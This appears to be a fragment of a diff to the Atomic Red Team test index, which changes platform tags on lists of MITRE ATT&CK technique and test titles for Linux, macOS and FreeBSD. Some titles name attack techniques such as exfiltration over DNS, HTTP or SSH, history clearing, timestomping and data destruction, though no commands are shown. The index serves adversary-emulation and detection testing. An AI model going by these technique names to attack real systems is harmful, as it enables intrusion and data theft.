- Atomic Test #23: Active Directory Domain Search [linux]
|
||||
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
|
||||
- Atomic Test #1: Enumerate all accounts (Local) [freebsd, linux]
|
||||
- Atomic Test #2: View sudoers access [freebsd, linux, macos]
|
||||
- Atomic Test #3: View accounts with UID 0 [freebsd, linux, macos]
|
||||
- Atomic Test #4: List opened files by user [freebsd, linux, macos]
|
||||
- Atomic Test #1: Enumerate all accounts (Local) [linux]
|
||||
- Atomic Test #2: View sudoers access [linux, macos]
|
||||
- Atomic Test #3: View accounts with UID 0 [linux, macos]
|
||||
- Atomic Test #4: List opened files by user [linux, macos]
|
||||
- Atomic Test #5: Show if a user account has ever logged in remotely [linux]
|
||||
- Atomic Test #7: Enumerate users and groups [freebsd, linux, macos]
|
||||
- Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux]
|
||||
- Atomic Test #7: Enumerate users and groups [linux, macos]
|
||||
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
|
||||
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
|
||||
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
|
||||
- [T1069.002 Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md)
|
||||
- Atomic Test #15: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS [linux]
|
||||
- [T1007 System Service Discovery](../../T1007/T1007.md)
|
||||
- Atomic Test #3: System Service Discovery - systemctl [linux]
|
||||
- Atomic Test #4: System Service Discovery - service [linux]
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
|
||||
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
|
||||
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
|
||||
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
|
||||
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
|
||||
- Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
|
||||
- Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
|
||||
- Atomic Test #15: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
|
||||
- [T1135 Network Share Discovery](../../T1135/T1135.md)
|
||||
- Atomic Test #2: Network Share Discovery - linux [linux]
|
||||
- Atomic Test #3: Network Share Discovery - FreeBSD [linux]
|
||||
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1082 System Information Discovery](../../T1082/T1082.md)
|
||||
- Atomic Test #3: List OS Information [freebsd, linux, macos]
|
||||
- Atomic Test #3: List OS Information [linux, macos]
|
||||
- Atomic Test #4: Linux VM Check via Hardware [linux]
|
||||
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
|
||||
- Atomic Test #8: Hostname Discovery [freebsd, linux, macos]
|
||||
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [freebsd, macos, linux]
|
||||
- Atomic Test #6: FreeBSD VM Check via Kernel Modules [linux]
|
||||
- Atomic Test #8: Hostname Discovery [linux, macos]
|
||||
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos]
|
||||
- Atomic Test #25: Linux List Kernel Modules [linux]
|
||||
- Atomic Test #26: FreeBSD List Kernel Modules [linux]
|
||||
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
|
||||
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [freebsd, linux]
|
||||
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [linux]
|
||||
- Atomic Test #4: List Google Chromium Bookmark JSON Files on FreeBSD [linux]
|
||||
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
|
||||
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
|
||||
- Atomic Test #4: System Network Configuration Discovery (freebsd) [linux]
|
||||
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
|
||||
- Atomic Test #3: Nix File and Directory Discovery [freebsd, macos, linux]
|
||||
- Atomic Test #4: Nix File and Directory Discovery 2 [freebsd, macos, linux]
|
||||
- Atomic Test #3: Nix File and Directory Discovery [linux, macos]
|
||||
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
|
||||
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
|
||||
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [freebsd, linux, macos]
|
||||
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
|
||||
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1057 Process Discovery](../../T1057/T1057.md)
|
||||
- Atomic Test #1: Process Discovery - ps [freebsd, linux, macos]
|
||||
- Atomic Test #1: Process Discovery - ps [linux, macos]
|
||||
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
|
||||
- Atomic Test #1: Permission Groups Discovery (Local) [freebsd, macos, linux]
|
||||
- Atomic Test #1: Permission Groups Discovery (Local) [linux, macos]
|
||||
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
|
||||
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
|
||||
- Atomic Test #2: Examine password complexity policy - FreeBSD [linux]
|
||||
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 7.x [linux]
|
||||
- Atomic Test #4: Examine password complexity policy - CentOS/RHEL 6.x [linux]
|
||||
- Atomic Test #5: Examine password expiration policy - All Linux [linux]
|
||||
- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
|
||||
- Atomic Test #3: Discover System Language with locale [freebsd, linux]
|
||||
- Atomic Test #3: Discover System Language with locale [linux]
|
||||
- Atomic Test #4: Discover System Language with localectl [linux]
|
||||
- Atomic Test #5: Discover System Language by locale file [linux]
|
||||
- Atomic Test #6: Discover System Language by Environment Variable Query [freebsd, linux]
|
||||
- Atomic Test #6: Discover System Language by Environment Variable Query [linux]
|
||||
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
|
||||
- Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
|
||||
- Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [linux]
|
||||
- [T1018 Remote System Discovery](../../T1018/T1018.md)
|
||||
- Atomic Test #6: Remote System Discovery - arp nix [freebsd, linux, macos]
|
||||
- Atomic Test #7: Remote System Discovery - sweep [freebsd, linux, macos]
|
||||
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
|
||||
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
|
||||
- Atomic Test #12: Remote System Discovery - ip neighbour [linux]
|
||||
- Atomic Test #13: Remote System Discovery - ip route [linux]
|
||||
- Atomic Test #14: Remote System Discovery - netstat [linux]
|
||||
- Atomic Test #15: Remote System Discovery - ip tcp_metrics [linux]
|
||||
- [T1046 Network Service Discovery](../../T1046/T1046.md)
|
||||
- Atomic Test #1: Port Scan [linux, macos]
|
||||
- Atomic Test #2: Port Scan Nmap [linux, macos]
|
||||
- Atomic Test #3: Port Scan Nmap for FreeBSD [linux]
|
||||
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
@@ -662,38 +765,41 @@
|
||||
- [T1531 Account Access Removal](../../T1531/T1531.md)
|
||||
- Atomic Test #4: Change User Password via passwd [macos, linux]
|
||||
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
|
||||
- Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [linux]
|
||||
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1496 Resource Hijacking](../../T1496/T1496.md)
|
||||
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [freebsd, macos, linux]
|
||||
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos]
|
||||
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1485 Data Destruction](../../T1485/T1485.md)
|
||||
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [freebsd, linux, macos]
|
||||
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos]
|
||||
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
|
||||
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
|
||||
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
|
||||
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [freebsd, macos, linux]
|
||||
- Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [freebsd, linux]
|
||||
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
|
||||
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
|
||||
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [linux, macos]
|
||||
- Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [linux]
|
||||
- Atomic Test #7: Reboot System via `halt` - FreeBSD [linux]
|
||||
- Atomic Test #8: Reboot System via `halt` - Linux [linux]
|
||||
- Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [freebsd, linux]
|
||||
- Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [linux]
|
||||
- Atomic Test #10: Reboot System via `poweroff` - FreeBSD [linux]
|
||||
- Atomic Test #11: Reboot System via `poweroff` - Linux [linux]
|
||||
|
||||
# execution
|
||||
- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
|
||||
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
|
||||
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
|
||||
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
|
||||
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -709,34 +815,39 @@
|
||||
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
|
||||
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
|
||||
- Atomic Test #1: Create and Execute Bash Shell Script [freebsd, linux, macos]
|
||||
- Atomic Test #2: Command-Line Interface [freebsd, linux, macos]
|
||||
- Atomic Test #1: Create and Execute Bash Shell Script [linux, macos]
|
||||
- Atomic Test #2: Command-Line Interface [linux, macos]
|
||||
- Atomic Test #3: Harvest SUID executable files [linux]
|
||||
- Atomic Test #4: LinEnum tool execution [linux]
|
||||
- Atomic Test #5: New script file in the tmp directory [freebsd, linux]
|
||||
- Atomic Test #6: What shell is running [freebsd, linux]
|
||||
- Atomic Test #7: What shells are available [freebsd, linux]
|
||||
- Atomic Test #8: Command line scripts [freebsd, linux]
|
||||
- Atomic Test #5: New script file in the tmp directory [linux]
|
||||
- Atomic Test #6: What shell is running [linux]
|
||||
- Atomic Test #7: What shells are available [linux]
|
||||
- Atomic Test #8: Command line scripts [linux]
|
||||
- Atomic Test #9: Obfuscated command line scripts [linux]
|
||||
- Atomic Test #10: Obfuscated command line scripts (freebsd) [linux]
|
||||
- Atomic Test #11: Change login shell [linux]
|
||||
- Atomic Test #12: Change login shell (freebsd) [linux]
|
||||
- Atomic Test #13: Environment variable scripts [linux]
|
||||
- Atomic Test #14: Environment variable scripts (freebsd) [linux]
|
||||
- Atomic Test #15: Detecting pipe-to-shell [linux]
|
||||
- Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux]
|
||||
- Atomic Test #17: Current kernel information enumeration [linux]
|
||||
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
|
||||
- Atomic Test #1: Execute shell script via python's command mode arguement [freebsd, linux]
|
||||
- Atomic Test #2: Execute Python via scripts [freebsd, linux]
|
||||
- Atomic Test #3: Execute Python via Python executables [freebsd, linux]
|
||||
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [freebsd, linux]
|
||||
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
|
||||
- Atomic Test #2: Execute Python via scripts [linux]
|
||||
- Atomic Test #3: Execute Python via Python executables [linux]
|
||||
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
|
||||
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
|
||||
- Atomic Test #2: At - Schedule a job [linux]
|
||||
- Atomic Test #3: At - Schedule a job freebsd [linux]
|
||||
|
||||
# initial-access
|
||||
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -760,8 +871,11 @@
|
||||
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
|
||||
- Atomic Test #8: Create local account (Linux) [linux]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [linux]
|
||||
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
|
||||
- Atomic Test #12: Login as nobody (Linux) [linux]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [linux]
|
||||
|
||||
# exfiltration
|
||||
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -772,21 +886,22 @@
|
||||
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
|
||||
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux, freebsd]
|
||||
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux]
|
||||
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
|
||||
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
|
||||
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
|
||||
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
|
||||
- Atomic Test #1: Data Transfer Size Limits [macos, linux, freebsd]
|
||||
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
|
||||
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux, freebsd]
|
||||
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [freebsd, linux]
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
|
||||
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
|
||||
- Atomic Test #8: Python3 http.server [linux]
|
||||
- Atomic Test #9: Python3 http.server (freebsd) [linux]
|
||||
|
||||
|
||||
@@ -8,13 +8,13 @@
|
||||
- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
|
||||
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [freebsd, macos, linux]
|
||||
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [freebsd, macos, linux]
|
||||
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [freebsd, macos, linux]
|
||||
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [freebsd, macos, linux]
|
||||
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos]
|
||||
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos]
|
||||
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos]
|
||||
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos]
|
||||
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
|
||||
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
|
||||
- Atomic Test #7: chown - Change file or folder mode ownership only [freebsd, macos, linux]
|
||||
- Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos]
|
||||
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
|
||||
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
|
||||
- Atomic Test #11: Chmod through c script [macos, linux]
|
||||
@@ -28,7 +28,7 @@
|
||||
- Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
|
||||
- T1116 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
|
||||
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux, freebsd]
|
||||
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
|
||||
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
|
||||
@@ -60,10 +60,10 @@
|
||||
- Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
|
||||
- Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
|
||||
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
|
||||
- Atomic Test #3: Base64 decoding with Python [freebsd, linux, macos]
|
||||
- Atomic Test #4: Base64 decoding with Perl [freebsd, linux, macos]
|
||||
- Atomic Test #3: Base64 decoding with Python [linux, macos]
|
||||
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
|
||||
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
|
||||
- Atomic Test #8: Hex decoding with shell utilities [freebsd, linux, macos]
|
||||
- Atomic Test #8: Hex decoding with shell utilities [linux, macos]
|
||||
- Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]
|
||||
- Atomic Test #10: XOR decoding and command execution using Python [linux, macos]
|
||||
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -75,10 +75,10 @@
|
||||
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
|
||||
- Atomic Test #1: Set a file's access timestamp [freebsd, linux, macos]
|
||||
- Atomic Test #2: Set a file's modification timestamp [freebsd, linux, macos]
|
||||
- Atomic Test #3: Set a file's creation timestamp [freebsd, linux, macos]
|
||||
- Atomic Test #4: Modify file timestamps using reference file [freebsd, linux, macos]
|
||||
- Atomic Test #1: Set a file's access timestamp [linux, macos]
|
||||
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
|
||||
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
|
||||
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
|
||||
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -87,8 +87,8 @@
|
||||
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
|
||||
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [freebsd, macos, linux]
|
||||
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [freebsd, macos, linux]
|
||||
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
|
||||
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
|
||||
@@ -148,9 +148,9 @@
|
||||
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
|
||||
- Atomic Test #4: Install root CA on macOS [macos]
|
||||
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
|
||||
- Atomic Test #3: C compile [freebsd, linux, macos]
|
||||
- Atomic Test #4: CC compile [freebsd, linux, macos]
|
||||
- Atomic Test #5: Go compile [freebsd, linux, macos]
|
||||
- Atomic Test #3: C compile [linux, macos]
|
||||
- Atomic Test #4: CC compile [linux, macos]
|
||||
- Atomic Test #5: Go compile [linux, macos]
|
||||
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -161,8 +161,8 @@
|
||||
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
|
||||
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [freebsd, linux, macos]
|
||||
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [freebsd, linux, macos]
|
||||
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos]
|
||||
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
|
||||
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
|
||||
- Atomic Test #3: Binary simply packed by UPX [macos]
|
||||
@@ -174,7 +174,7 @@
|
||||
- Atomic Test #1: Space After Filename (Manual) [macos]
|
||||
- Atomic Test #2: Space After Filename [macos, linux]
|
||||
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
|
||||
- Atomic Test #1: Create a hidden file in a hidden directory [freebsd, linux, macos]
|
||||
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
|
||||
- Atomic Test #2: Mac Hidden file [macos]
|
||||
